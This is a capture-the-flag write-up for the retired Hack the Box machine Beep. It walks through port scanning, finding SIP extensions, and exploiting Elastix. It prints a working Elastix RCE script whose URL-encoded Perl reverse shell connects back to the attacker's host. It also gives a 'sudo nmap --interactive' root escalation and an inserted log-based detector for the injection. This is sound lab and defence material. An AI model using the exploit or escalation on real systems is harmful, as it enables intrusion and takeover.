My writeup of how to compromise the retired Hack the Box machine, Beep.
Note: You can find my previous guide to Shocker here.
As always we start with our initial enumeration.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.7
Lots of ports are open on this box, including SSH, HTTP and HTTPS, SMTP, and POP.
Browsing to port 80 redirects us straight to 443 and shows us a login page for Elastix, which is a VoIP PBX system.
A quick search on Exploit DB shows that there is a remote code execution vulnerability for Elastix 2.2.0, so let's give that a whirl.
We download the script from exploit-db and take a closer look at it. We need to edit it slightly to put in the target's IP and our own IP, along with the port we are going to be listening on. Start up netcat and then run the script ...
Uh oh. We get an SSL error. We need to modify the Python code a little to make it ignore certificate errors. We can change the script over to the following:
import urllib
import ssl

rhost="10.10.10.7"
lhost="10.10.14.15"
lport=443
extension="1000"

# Skip certificate validation for the self-signed cert on the box
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)
OK, now the script runs without any errors but we don't get a shell back. The likelihood is that the phone extension the script is looking for doesn't exist.
So we need another tool, SIPVicious, to locate a valid SIP extension. We utilise its war-dialling tool, svwar:
$ svwar -m INVITE -e100-300 10.10.10.7
So now we can modify our script again and change the extension over to 233. Running it now gives us our shell, and access to the first flag.
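From the defender's side, the request above is easy to spot in the web server log: a legitimate callmenum is a bare extension, whereas the exploit smuggles encoded CRLFs and Asterisk manager headers into it. The following detector is an added example, not code from the original writeup; the log lines are constructed samples in Apache combined format.

```python
"""Flag callme_page.php requests whose callmenum carries CRLF-injected AMI headers."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Manager-interface headers that never belong inside a dialled extension
SUSPICIOUS_HEADERS = ("application:", "data:", "action:")

def analyse_request(path):
    """Return a reason string if the request injects into callmenum, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/recordings/misc/callme_page.php"):
        return None
    # parse_qs percent-decodes values, so %0D%0A becomes a real CR/LF here
    params = parse_qs(parts.query, keep_blank_values=True)
    callmenum = params.get("callmenum", [""])[0]
    if "\r" not in callmenum and "\n" not in callmenum:
        return None
    low = callmenum.lower()
    hdrs = [h.rstrip(":") for h in SUSPICIOUS_HEADERS if h in low]
    return "CRLF in callmenum; injected AMI headers: " + ",".join(hdrs)

def scan_log(lines):
    """Return (client_ip, reason) for every suspicious request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = analyse_request(m["path"])
        if reason:
            hits.append((m["ip"], reason))
    return hits

# Constructed sample log: a normal call-me request, an injection attempt, noise
SAMPLE_LOG = [
    '10.10.14.15 - - [01/Jan/2020:10:00:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512',
    '10.10.14.15 - - [01/Jan/2020:10:00:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 512',
    '10.10.14.15 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```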
Reading the comments at the bottom of the exploit also tells us an incredibly easy way to get root. Simply enter the following into your shell.
> sudo nmap --interactive
> !sh
And done; a root shell and access to the final flag.
There are at least 3 other ways of getting shells on this box. I leave it to you as an exercise to find them.